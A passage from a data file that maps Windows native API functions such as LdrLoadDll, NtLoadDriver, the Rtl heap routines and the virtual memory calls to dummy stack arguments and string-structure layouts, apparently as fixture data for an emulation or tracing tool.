\"0xbadd00d0\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct130\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x000c\",\r\n \"fieldComment\": \"Length in bytes of string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd00e0\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"LdrGetDllHandle\": {\r\n \"ntFunc\": \"LdrGetDllHandle\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to HMODULE (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ModuleFileName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct131\",\r\n \"structureValueExpectations\": \"UNICODE_STRING structure describing the DLL name.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Unused parameter, typically None\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Pointer to search path (PWSTR), typically None\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct131\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0014\",\r\n \"fieldComment\": \"Length in bytes of string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd00f0\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"LdrGetProcedureAddress\": {\r\n \"ntFunc\": \"LdrGetProcedureAddress\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to PVOID FunctionAddress (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Ordinal, typically 0 if using FunctionName\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to ANSI_STRING FunctionName (dummy pointer)\",\r\n \"structurePointer\": \"ANSI_STRING\",\r\n \"structureRef\": \"struct132\",\r\n \"structureValueExpectations\": \"ANSI_STRING structure describing the function name.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x77770000\",\r\n \"additionalComment\": \"ModuleHandle (dummy HMODULE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct132\": {\r\n \"type\": \"ANSI_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0008\",\r\n \"fieldComment\": \"Length in bytes of string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PCHAR\",\r\n \"fieldValue\": \"0xbadd0100\",\r\n \"fieldComment\": \"Pointer to ANSI string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"LdrLoadDll\": {\r\n \"ntFunc\": \"LdrLoadDll\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to HMODULE ModuleHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ModuleFileName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct133\",\r\n \"structureValueExpectations\": \"UNICODE_STRING structure describing the DLL name.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Flags, typically 0\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PathToFile (PWCHAR), typically None\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct133\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0012\",\r\n \"fieldComment\": \"Length in bytes of string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0110\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"LdrQueryProcessModuleInformation\": {\r\n \"ntFunc\": \"LdrQueryProcessModuleInformation\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG RequiredSize (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0x00002000\",\r\n \"additionalComment\": \"ULONG BufferSize (8 KB typical buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to SYSTEM_MODULE_INFORMATION buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"LdrShutdownProcess\": {\r\n \"ntFunc\": \"LdrShutdownProcess\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"LdrShutdownThread\": {\r\n \"ntFunc\": \"LdrShutdownThread\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"LdrUnloadDll\": {\r\n \"ntFunc\": \"LdrUnloadDll\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x10000000\",\r\n \"additionalComment\": \"HANDLE ModuleHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtLoadDriver\": {\r\n \"ntFunc\": \"NtLoadDriver\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING DriverServiceName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct134\",\r\n \"structureValueExpectations\": \"UNICODE_STRING structure containing registry path to driver service.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct134\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0030\",\r\n \"fieldComment\": \"Length in bytes of the string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0032\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0030\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtUnloadDriver\": {\r\n \"ntFunc\": \"NtUnloadDriver\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None (no driver service name provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlImageNtHeader\": {\r\n \"ntFunc\": \"RtlImageNtHeader\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None (no module address provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlImageRvaToVa\": {\r\n \"ntFunc\": \"RtlImageRvaToVa\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None (no IMAGE_SECTION_HEADER pointer provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Rva = 0 (no relative virtual address provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None (no module base address provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None (no IMAGE_NT_HEADERS pointer provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtFlushWriteBuffer\": {\r\n \"ntFunc\": \"NtFlushWriteBuffer\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtShutdownSystem\": {\r\n \"ntFunc\": \"NtShutdownSystem\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ShutdownAction = 0 (ShutdownNoReboot)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryDefaultLocale\": {\r\n \"ntFunc\": \"NtQueryDefaultLocale\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000409\",\r\n \"additionalComment\": \"PLCID DefaultLocaleId (pointer to US English LCID, 0x409)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000409\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN UserProfile (TRUE, query user profile locale)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetDefaultLocale\": {\r\n \"ntFunc\": \"NtSetDefaultLocale\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000409\",\r\n \"additionalComment\": \"LCID DefaultLocaleId (US English)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN UserProfile (TRUE, set user profile locale)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlAllocateHeap\": {\r\n \"ntFunc\": \"RtlAllocateHeap\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG Size (4096 bytes, typical page size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000008\",\r\n \"additionalComment\": \"ULONG Flags (HEAP_ZERO_MEMORY)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"PVOID HeapHandle (dummy heap handle pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00ee0000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlCompactHeap\": {\r\n \"ntFunc\": \"RtlCompactHeap\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (no flags, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"HANDLE HeapHandle (dummy heap handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlCreateHeap\": {\r\n \"ntFunc\": \"RtlCreateHeap\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"PRTL_HEAP_DEFINITION RtlHeapParams (dummy pointer, None for default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN Lock (TRUE, serialized heap)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG Commit (commit 4096 bytes initially)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00100000\",\r\n \"additionalComment\": \"ULONG Reserve (reserve 1MB for heap)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID Base (None, let system choose base address)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG Flags (HEAP_GROWABLE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlDestroyHeap\": {\r\n \"ntFunc\": \"RtlDestroyHeap\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HeapHandle (None, destroys default process heap)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlEnumProcessHeaps\": {\r\n \"ntFunc\": \"RtlEnumProcessHeaps\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Param (None, no user parameter passed to callback)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HeapEnumerationRoutine (None, no callback routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlFreeHeap\": {\r\n \"ntFunc\": \"RtlFreeHeap\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"MemoryPointer (None, no memory to free)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Flags (0, no special flags)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HeapHandle (None, default process heap)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlGetProcessHeaps\": {\r\n \"ntFunc\": \"RtlGetProcessHeaps\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HeapArray (None, caller wants heap count only)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"MaxNumberOfHeaps (16, typical small process)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlLockHeap\": {\r\n \"ntFunc\": \"RtlLockHeap\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HeapHandle (None, default process heap)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlProtectHeap\": {\r\n \"ntFunc\": \"RtlProtectHeap\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN Protect (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"PVOID HeapHandle (dummy heap handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlReAllocateHeap\": {\r\n \"ntFunc\": \"RtlReAllocateHeap\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00002000\",\r\n \"additionalComment\": \"ULONG Size (8 KB)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"PVOID MemoryPointer (dummy pointer to allocated memory)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000008\",\r\n \"additionalComment\": \"ULONG Flags (HEAP_ZERO_MEMORY)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"PVOID HeapHandle (dummy heap handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlSizeHeap\": {\r\n \"ntFunc\": \"RtlSizeHeap\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"PVOID MemoryPointer (dummy pointer to allocated memory)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (default, 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"PVOID HeapHandle (dummy heap handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlUnlockHeap\": {\r\n \"ntFunc\": \"RtlUnlockHeap\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"PVOID HeapHandle (dummy heap handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlValidateHeap\": {\r\n \"ntFunc\": \"RtlValidateHeap\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"PVOID AddressToValidate (dummy pointer to memory block)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (default, 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"PVOID HeapHandle (dummy heap handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"RtlValidateProcessHeaps\": {\r\n \"ntFunc\": \"RtlValidateProcessHeaps\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"RtlWalkHeap\": {\r\n \"ntFunc\": \"RtlWalkHeap\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"LPPROCESS_HEAP_ENTRY ProcessHeapEntry (None, typical for initial call)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID HeapHandle (None, means use process default heap)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAllocateVirtualMemory\": {\r\n \"ntFunc\": \"NtAllocateVirtualMemory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"ULONG Protect (PAGE_EXECUTE_READWRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG AllocationType (MEM_COMMIT)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"PSIZE_T RegionSize (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00002000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG_PTR ZeroBits (0, typical for user mode)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"PVOID BaseAddress (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00400000\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle, current process)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtFlushVirtualMemory\": {\r\n \"ntFunc\": \"NtFlushVirtualMemory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"PIO_STATUS_BLOCK IoStatusBlock (dummy pointer)\",\r\n \"structurePointer\": \"IO_STATUS_BLOCK\",\r\n \"structureRef\": \"struct135\",\r\n \"structureValueExpectations\": \"Status and Information fields.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"PULONG NumberOfBytesToFlush (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"PVOID BaseAddress (typical heap base address)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle, current process)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct135\": {\r\n \"type\": \"IO_STATUS_BLOCK\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Status\",\r\n \"fieldType\": \"NTSTATUS\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Operation status (initialized to 0)\"\r\n },\r\n {\r\n \"fieldName\": \"Information\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Additional info (initialized to 0)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtFreeVirtualMemory\": {\r\n \"ntFunc\": \"NtFreeVirtualMemory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00008000\",\r\n \"additionalComment\": \"ULONG FreeType (MEM_RELEASE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"PSIZE_T RegionSize (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00002000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"PVOID BaseAddress (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00400000\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle, current process)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtLockVirtualMemory\": {\r\n \"ntFunc\": \"NtLockVirtualMemory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"LockOption 